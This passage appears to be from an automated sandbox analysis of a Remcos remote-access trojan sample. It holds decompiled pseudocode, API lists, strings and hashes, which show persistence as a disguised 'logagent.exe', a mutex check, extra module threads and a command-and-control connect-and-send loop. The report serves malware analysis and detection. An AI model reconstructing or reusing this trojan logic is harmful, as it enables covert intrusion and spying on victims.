                      											}
                      										}
                      									}
                      								}
                      							}
                      							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
                      							if(__eflags != 0) {
                      								E0040D3F7();
                      							}
                      							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
                      							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
                      							 *0x46bb02 = __eflags != 0;
                      							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
                      							 *0x46bafb = __eflags != 0;
                      							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
                      							 *0x46bb00 = __eflags != 0;
                      							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
                      							if(__eflags != 0) {
                      								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
                      								_t25 = _t240 + 2; // 0x2
                      								_t448 = _t25;
                      								do {
                      									_t423 =  *_t240;
                      									_t240 = _t240 + 2;
                      									__eflags = _t423 - _t462;
                      								} while (_t423 != _t462);
                      								__eflags = _t240 - _t448;
                      								if(__eflags != 0) {
                      									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
                      									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
                      									_t448 =  *_t244;
                      									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
                      									L00401EF0();
                      									_t477 = 0x46c578;
                      								}
                      							}
                      							__eflags = _v776 - _t462;
                      							if(_v776 != _t462) {
                      								L00431F00(_t462,  &_v524, _t462, 0x208);
                      								_t121 = E00402489();
                      								_t122 = L00401F95(0x46c560);
                      								_t449 = L00401F95(0x46c518);
                      								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                      								_t501 = _t499 + 0x20;
                      								L00409DC9(_t272, 0x46c500,  &_v524);
                      								_t465 = 0x46c578;
                      								goto L47;
                      							} else {
                      								__eflags =  *0x46bb01;
                      								if(__eflags == 0) {
                      									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\logagent.exe");
                      								} else {
                      									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
                      									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
                      									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
                      									__eflags =  *_t229;
                      									__eflags =  *_t231;
                      									_t477 = 0x46c578;
                      									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
                      									E0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                      									_t499 = _t499 + 0xc;
                      									_t272 = 1;
                      									_t462 = 0;
                      								}
                      								_t210 = E00402489();
                      								_t452 = 2;
                      								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                      								_push(_t394);
                      								_v780 = _t394;
                      								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                      								__eflags = _t486;
                      								if(_t486 == 0) {
                      									_t486 = _t462;
                      								} else {
                      									L00431F00(_t462, _t486, _t462, _v780);
                      									_t499 = _t499 + 0xc;
                      								}
                      								_t214 = L00401EEB(0x46c500);
                      								_t455 = _t486 - _t214;
                      								__eflags = _t455;
                      								_t467 = 2;
                      								do {
                      									_t397 =  *_t214 & 0x0000ffff;
                      									 *(_t214 + _t455) = _t397;
                      									_t214 = _t214 + _t467;
                      									__eflags = _t397;
                      								} while (_t397 != 0);
                      								_push(_t397);
                      								_t215 = E00402489();
                      								_t216 = L00401F95(0x46c560);
                      								_t217 = E00402489();
                      								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
                      								E0042F4CF(_t486);
                      								_t501 = _t499 + 0x1c;
                      								_t465 = 0x46c578;
                      								L00401E49(0x46c578, _t219, __eflags, 0xd);
                      								_t449 = "0";
                      								__eflags = E0040EAD9(__eflags);
                      								if(__eflags == 0) {
                      									L47:
                      									_push(_t272);
                      									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
                      									_t502 = _t501 - 0x18;
                      									E00402084(_t272, _t502, _t129);
                      									_push("licence");
                      									_t450 = L00401F95(0x46c518); // executed
                      									E00410AA7(0x46c518, _t131); // executed
                      									_t497 = _t502 + 0x20;
                      									_t135 = E00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
                      									 *0x46bb03 = _t135;
                      									__eflags = _t135 - 2;
                      									if(_t135 != 2) {
                      										__eflags = _t135 - _t272;
                      										if(__eflags == 0) {
                      											_t388 = 0;
                      											__eflags = 0;
                      											goto L51;
                      										}
                      									} else {
                      										_t388 = _t272;
                      										L51:
                      										L00418F59(_t272, _t388, _t450);
                      										__eflags = 0;
                      										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
                      									}
                      									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
                      									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
                      									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
                      									__eflags =  *_t137;
                      									_t471 = 0x46c578;
                      									_t144 = E00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
                      									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
                      									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                      									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
                      									if(__eflags != 0) {
                      										_t461 = CreateThread;
                      									} else {
                      										_t199 = 2;
                      										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
                      										 *_t485 = 0;
                      										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                      										_t203 = L00401F95(_t386);
                      										_t461 = CreateThread;
                      										__eflags =  *_t203;
                      										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                      										CreateThread(0, 0, E00415938, _t485, 0, 0);
                      										_t471 = 0x46c578;
                      									}
                      									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
                      									if(__eflags == 0) {
                      										_t193 = 2;
                      										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
                      										 *_t484 = 1;
                      										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                      										_t196 = L00401F95(_t382);
                      										__eflags =  *_t196;
                      										__eflags = 0;
                      										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                      										CreateThread(0, 0, E00415938, _t484, 0, 0);
                      										_t471 = 0x46c578;
                      									}
                      									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
                      									if(__eflags == 0) {
                      										 *0x46ba75 = 1;
                      										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
                      										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
                      										_t450 =  *_t185;
                      										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
                      										L00401EF0();
                      										__eflags = 0;
                      										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
                      										_t471 = 0x46c578;
                      									}
                      									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                      									if(__eflags == 0) {
                      										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
                      										_t182 = E00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
                      										__eflags =  *_t471;
                      										_t450 = _t182;
                      										__eflags =  *_t471 != 0;
                      										E0040A679(_t182);
                      									}
                      									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
                      									L00401EFA(0x46c584, _t450, _t471, _t160);
                      									_t360 =  &_v776;
                      									L00401EF0();
                      									_t163 =  *0x46bd14;
                      									_t269 = 0;
                      									__eflags = _t163;
                      									if(_t163 != 0) {
                      										 *_t163(0); // executed
                      									}
                      									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
                      									__eflags =  *0x46bd4e;
                      									if( *0x46bd4e != 0) {
                      										CreateThread(_t269, _t269, E0040FAC7, _t269, _t269, _t269);
                      									}
                      									__eflags =  *0x46bd4f;
                      									if( *0x46bd4f != 0) {
                      										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
                      									}
                      									_t165 =  *0x46a9d0; // 0x1
                      									_t166 = _t165 - _t269;
                      									__eflags = _t166;
                      									if(__eflags == 0) {
                      										goto L71;
                      									} else {
                      										__eflags = _t166 - 1;
                      										if(__eflags == 0) {
                      											_push("Administrator");
                      											goto L72;
                      										}
                      									}
                      									goto L73;
                      								} else {
                      									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
                      									_t506 = _t501 - 0x18;
                      									_t449 = _t224;
                      									E004172DA(_t506, _t224);
                      									_t226 = L0040CE44(__eflags);
                      									_t501 = _t506 + 0x18;
                      									__eflags = _t226 - _t272;
                      									if(__eflags != 0) {
                      										goto L47;
                      									} else {
                      										_t272 = 3;
                      										goto L45;
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						_v780 = 0;
                      						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
                      						__eflags = _t265;
                      						if(_t265 != 0) {
                      							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
                      							L0040FD95();
                      							L71:
                      							_push("User");
                      							L72:
                      							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
                      							E00402084(_t269, _t497 - 4, "[Info]");
                      							L00416C80(_t269, _t461);
                      							_t360 =  &_v784;
                      							L00401FC7(); // executed
                      							L73:
                      							E00411929(); // executed
                      							asm("int3");
                      							_push(_t471);
                      							_t481 = _t360 + 0x68;
                      							E0040D515(_t481);
                      							_t284 = _t481;
                      							 *_t284 = 0x460788;
                      							 *_t284 = 0x460744;
                      							return E004304F6(_t284);
                      						} else {
                      							goto L8;
                      						}
                      					}
                      				} else {
                      					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                      					if(__eflags != 0) {
                      						goto L6;
                      					} else {
                      						__eax =  *(__ecx + 2) & 0x000000ff;
                      						__eflags = __al;
                      						if(__eflags != 0) {
                      							goto L6;
                      						} else {
                      							_push(__ecx);
                      							_push(__ecx);
                      							__ecx =  &_v700;
                      							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
                      							__ecx = 0x46c578;
                      							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
                      							__edx = __eax;
                      							__ecx =  &_v720;
                      							__eax = E0040E8BB( &_v720, __edx, __eflags);
                      							__ecx =  &_v720;
                      							__eax = E0040D4F5( &_v720, __edx, __eflags);
                      							__ecx =  &_v720;
                      							L74();
                      							__ecx =  &_v744;
                      							L00401FC7() = 0;
                      							__eax = 1;
                      							__eflags = 1;
                      							L5:
                      							return _t97;
                      						}
                      					}
                      				}
                      			}

                      APIs
                      • OpenMutexA.KERNEL32 ref: 0040C471
                      • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                      • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                      • GetLastError.KERNEL32 ref: 0040C4EF
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104), ref: 0040C510
                        • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                      • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Exe$Exe$Inj$Octopus-GM39UT$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                      • API String ID: 1247502528-3937525246
                      • Opcode ID: 8b3f7329c46b1e9529f9da8098eb2aead49ba47a864d83bed9ed11ed871e0adb
                      • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                      • Opcode Fuzzy Hash: 8b3f7329c46b1e9529f9da8098eb2aead49ba47a864d83bed9ed11ed871e0adb
                      • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00411929() {
                      				struct _SECURITY_ATTRIBUTES* _v8;
                      				char _v20;
                      				char _v32;
                      				char _v56;
                      				char _v80;
                      				char _v104;
                      				char _v128;
                      				char _v140;
                      				void* _v163;
                      				char _v164;
                      				char _v188;
                      				char _v212;
                      				char _v236;
                      				char _v260;
                      				char _v284;
                      				char _v308;
                      				char _v332;
                      				char _v356;
                      				char _v380;
                      				char _v404;
                      				char _v428;
                      				char _v452;
                      				char _v476;
                      				char _v500;
                      				char _v524;
                      				char _v548;
                      				char _v572;
                      				char _v596;
                      				char _v620;
                      				char _v644;
                      				char _v668;
                      				char _v692;
                      				char _v716;
                      				char _v740;
                      				char _v764;
                      				char _v788;
                      				char _v812;
                      				char _v836;
                      				char _v860;
                      				char _v884;
                      				char _v908;
                      				char _v932;
                      				char _v956;
                      				char _v980;
                      				char _v1004;
                      				char _v1028;
                      				char _v1052;
                      				char _v1076;
                      				char _v1100;
                      				char _v1124;
                      				char _v1148;
                      				char _v1172;
                      				char _v1196;
                      				char _v1220;
                      				char _v1244;
                      				char _v1268;
                      				char _v1292;
                      				char _v1316;
                      				char _v1340;
                      				char _v1364;
                      				char _v1388;
                      				char _v1412;
                      				char _v1436;
                      				char _v2436;
                      				signed int _t166;
                      				void* _t168;
                      				long _t172;
                      				void* _t174;
                      				signed char _t178;
                      				void* _t184;
                      				short _t195;
                      				void* _t197;
                      				void* _t198;
                      				void* _t200;
                      				long _t204;
                      				short _t209;
                      				void* _t210;
                      				void* _t212;
                      				void* _t225;
                      				void* _t233;
                      				void* _t234;
                      				void* _t237;
                      				intOrPtr* _t238;
                      				void* _t241;
                      				void* _t242;
                      				void* _t243;
                      				void* _t246;
                      				void* _t248;
                      				void* _t251;
                      				void* _t252;
                      				void* _t253;
                      				void* _t254;
                      				void* _t256;
                      				void* _t257;
                      				void* _t258;
                      				intOrPtr* _t353;
                      				void* _t367;
                      				void* _t369;
                      				void* _t371;
                      				void* _t373;
                      				void* _t375;
                      				long _t379;
                      				void* _t380;
                      				void* _t381;
                      				char* _t401;
                      				void* _t616;
                      				void* _t625;
                      				void* _t677;
                      				signed short _t681;
                      				struct _SECURITY_ATTRIBUTES* _t684;
                      				void* _t694;
                      				void* _t695;
                      				void* _t696;
                      				void* _t697;
                      				void* _t698;
                      				void* _t699;
                      				void* _t700;
                      				void* _t701;
                      				void* _t703;
                      				void* _t704;
                      				void* _t708;
                      				void* _t709;
                      				void* _t710;
                      				void* _t711;
                      				void* _t712;
                      				long _t714;
                      
                      				_push(_t380);
                      				E004020D5(_t380,  &_v104);
                      				L00416FDC( &_v236, _t616);
                      				E004020D5(_t380,  &_v1436);
                      				_t677 = 0x46c578;
                      				_t166 = E00436769(_t164, L00401F95(L00401E49(0x46c578, _t616, _t712, 0x29)));
                      				if(_t166 != 0) {
                      					_t379 = _t166 * 0x3e8;
                      					_t714 = _t379;
                      					Sleep(_t379);
                      				}
                      				_t695 = _t694 - 0x18;
                      				E00402084(_t380, _t695, 0x4657ec);
                      				_t168 = L00401E49(_t677, _t616, _t714, 0);
                      				_t696 = _t695 - 0x18;
                      				E004020EC(_t380, _t696, _t616, _t714, _t168);
                      				E00417478( &_v32, _t616);
                      				_t697 = _t696 + 0x30;
                      				_t684 = 0;
                      				_v8 = 0;
                      				_t381 = 0;
                      				L00401E49(_t677, _t616, _t714, 0x3a);
                      				_t617 = 0x45f6bc;
                      				_t172 = E0040EAD9(_t714);
                      				_t715 = _t172;
                      				if(_t172 != 0) {
                      					L00401E49(_t677, 0x45f6bc, _t715, 0x3a);
                      					_t367 = E00402489();
                      					_t369 = L00401F95(L00401E49(_t677, 0x45f6bc, _t715, 0x3a));
                      					L00401E49(_t677, 0x45f6bc, _t715, 0x39);
                      					_t371 = E00402489();
                      					_t373 = L00401F95(L00401E49(_t677, _t617, _t715, 0x39));
                      					L00401E49(_t677, _t617, _t715, 0x38);
                      					_t375 = E00402489();
                      					L00401F95(L00401E49(_t677, _t617, _t715, 0x38));
                      					_t617 = _t375;
                      					E00404882(_t375, _t373, _t371, _t369, _t367);
                      					_t697 = _t697 + 0x10;
                      					_t684 = 0;
                      				}
                      				L4:
                      				_t698 = _t697 - 0x18;
                      				E00402084(_t381, _t698, 0x4657f0);
                      				_t174 = L00401E49( &_v32, _t617, _t715, _t381);
                      				_t699 = _t698 - 0x18;
                      				E004020EC(_t381, _t699, _t617, _t715, _t174);
                      				E00417478( &_v20, _t617);
                      				_t697 = _t699 + 0x30;
                      				L00401E49( &_v20, _t617, _t715, 2);
                      				_t618 = "0";
                      				_t178 = E00405A6F("0");
                      				asm("sbb al, al");
                      				 *0x46bae0 =  ~_t178 + 1;
                      				E0040498B(0x46c780);
                      				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
                      					_t718 =  *0x46c781 - 1;
                      					_t401 =  &_v104;
                      					if( *0x46c781 != 1) {
                      						_push(0x45f6bc);
                      					} else {
                      						_push(" (TLS)");
                      					}
                      					E00405A0B(_t381, _t401);
                      					_t700 = _t697 - 0x18;
                      					_t184 = L00401E49( &_v20, _t618, _t718, 1);
                      					_t617 = L00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, E004075E6( &_v80, "Connecting to ", _t718, L00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
                      					L00402F93(_t381, _t700, _t188, _t718,  &_v104);
                      					_t701 = _t700 - 0x14;
                      					E00402084(_t381, _t701, "[Info]");
                      					L00416C80(_t381, _t677);
                      					_t697 = _t701 + 0x30;
                      					L00401FC7();
                      					L00401FC7();
                      					L00401FC7();
                      					_t684 = _v8;
                      				}
                      				_t195 = 2;
                      				 *0x46bacc = _t195;
                      				_t197 = L00401F95(L00401E49( &_v20, _t617, _t718, 0));
                      				__imp__#52(_t197); // executed
                      				_t719 = _t197;
                      				if(_t197 != 0) {
                      					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
                      					_t209 = E00436769(_t207, L00401F95(L00401E49( &_v20, _t617, _t719, 1)));
                      					__imp__#9();
                      					_t697 = _t697 + 0xc - 0x10;
                      					 *0x46bace = _t209;
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					_t210 = E00404A08(_t617, _t209); // executed
                      					_t720 = _t210;
                      					if(_t210 != 0) {
                      						_t703 = _t697 - 0x18;
                      						_t212 = L00401E49( &_v20, _t617, _t720, 1);
                      						_t625 = L00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, E004075E6( &_v212, "Connected to  ", _t720, L00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
                      						L00402F93(_t381, _t703, _t625, _t720,  &_v104);
                      						_t704 = _t703 - 0x14;
                      						E00402084(_t381, _t704, "[Info]");
                      						L00416C80(_t381, 0x46c780);
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00404E9A(0x46c780, 0xa, 0);
                      						_v164 = 0;
                      						asm("stosd");
                      						_v8 = 1;
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						_t225 = L00416EFA(0x46c780);
                      						_push(_t625);
                      						E00411912( &_v164, "%I64u", _t225);
                      						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
                      						E0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
                      						E004020EC(_t381,  &_v80, _t625, _t720, L00401E49(0x46c578, _t625, _t720, 1));
                      						_t233 = E00402489();
                      						_t234 = L00401F95(0x46c560);
                      						_t237 = E00410A30(L00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233);
                      						_t708 = _t704 + 0x60;
                      						if(_t237 != 0) {
                      							E00405A0B(_t381,  &_v80,  &_v2436);
                      						}
                      						_t238 =  *0x46bd44; // 0x0
                      						_t681 = 0;
                      						_t722 = _t238;
                      						if(_t238 != 0) {
                      							_t681 =  *_t238() & 0x0000ffff;
                      						}
                      						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\logagent.exe");
                      						_t709 = _t708 - 0x18;
                      						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
                      						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
                      						_t243 = L00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
                      						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
                      						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
                      						_t251 = E0041739C(_t381,  &_v1292, E0041719C( &_v1316));
                      						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
                      						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
                      						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
                      						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
                      						_t257 = E0040D1E5( &_v1172);
                      						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
                      						_t617 = L00402F93(_t381,  &_v212, L00402F93(_t381,  &_v188, L00402F93(_t381,  &_v260, L00402F1D( &_v284, L00402F93(_t381,  &_v308, L00402F1D( &_v332, L00402F93(_t381,  &_v356, L00402F93(_t381,  &_v380, L00402F93(_t381,  &_v404, L00402F93(_t381,  &_v428, L00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, L00402F93(_t381,  &_v500, L00402F1D( &_v524, L00402F93(_t381,  &_v548, L00402F1D( &_v572, L00402F93(_t381,  &_v596, E0040759C(_t381,  &_v620, L00402F93(_t381,  &_v644, L00402F1D( &_v668, L00402F93(_t381,  &_v692, L00402F1D( &_v716, L00402F93(_t381,  &_v740, L00402F1D( &_v764, L00402F93(_t381,  &_v788, L00402F1D( &_v812, L00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, L00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, L00402F93(_t381,  &_v932, L00402F1D( &_v956, L00402F93(_t381,  &_v980, L00402F93(_t381,  &_v1004, L00402F93(_t381,  &_v1028, L00402F1D( &_v1052, L00402F93(_t381,  &_v1076, L00402F1D( &_v1100, L00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Octopus-GM39UT"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
                      						L00402F93(_t381, _t709, _t297, _t722, "Exe");
                      						_push(0x4b);
                      						L00404AA4(_t381, 0x46c780, _t297, _t722);
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401EF0();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401FC7();
                      						L00401EF0();
                      						L00404BBE(0x46c780, _t297, E004123B9, 1);
                      						_t353 =  *0x46bd48; // 0x0
                      						if(_t353 != 0 &&  *0x46bd4d != 0) {
                      							_t353 =  *_t353();
                      							 *0x46bd4d = 0;
                      						}
                      						if( *0x46c39a != 0) {
                      							_t353 = E0040951E(_t381, 0x46c350);
                      						}
                      						E004059C5(_t353);
                      						_t710 = _t709 - 0x18;
                      						E00402084(_t381, _t710, "Disconnected!");
                      						_t711 = _t710 - 0x18;
                      						E00402084(_t381, _t711, "[Info]");
                      						L00416C80(_t381, 0x46c238);
                      						_t697 = _t711 + 0x30;
                      						if( *0x46bea4 != 0) {
                      							CreateThread(0, 0, E0041667F, 0, 0, 0);
                      						}
                      						L00401FC7();
                      						L00401EF0();
                      					}
                      					_t684 = _v8;
                      					_t677 = 0x46c578;
                      				}
                      				_t684 = _t684 - 1;
                      				_v8 = _t684;
                      				_t381 = _t381 + 1;
                      				_t198 = E004021F5( &_v32);
                      				_t728 = _t381 - _t198;
                      				if(_t381 >= _t198) {
                      					_t200 = 2;
                      					_t381 = 0;
                      					_t204 = E00436769(_t201, L00401F95(L00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
                      					_t715 = _t204;
                      					Sleep(_t204); // executed
                      				}
                      				L00401E74( &_v20, _t617);
                      				goto L4;
                      			}

                      APIs
                      • Sleep.KERNEL32(00000000,00000029,751443E0,0046C578,00000000), ref: 0041197A
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • gethostbyname.WS2_32(00000000), ref: 00411B6B
                      • htons.WS2_32(00000000), ref: 00411BA9
                      • Sleep.KERNELBASE(00000000,00000002), ref: 004123A6
                        • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                        • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                        • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                      • GetTickCount.KERNEL32 ref: 00411DA2
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • CreateThread.KERNEL32 ref: 00412355
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                      • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$Exe$Octopus-GM39UT$[Info]$name
                      • API String ID: 2130001850-3446537527
                      • Opcode ID: c487f95d1be02be6a142f853801d1198bedf726f8d6748e6079fc182089de9af
                      • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                      • Opcode Fuzzy Hash: c487f95d1be02be6a142f853801d1198bedf726f8d6748e6079fc182089de9af
                      • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LongNamePath
                      • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                      • API String ID: 82841172-1609423294
                      • Opcode ID: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
                      • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                      • Opcode Fuzzy Hash: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
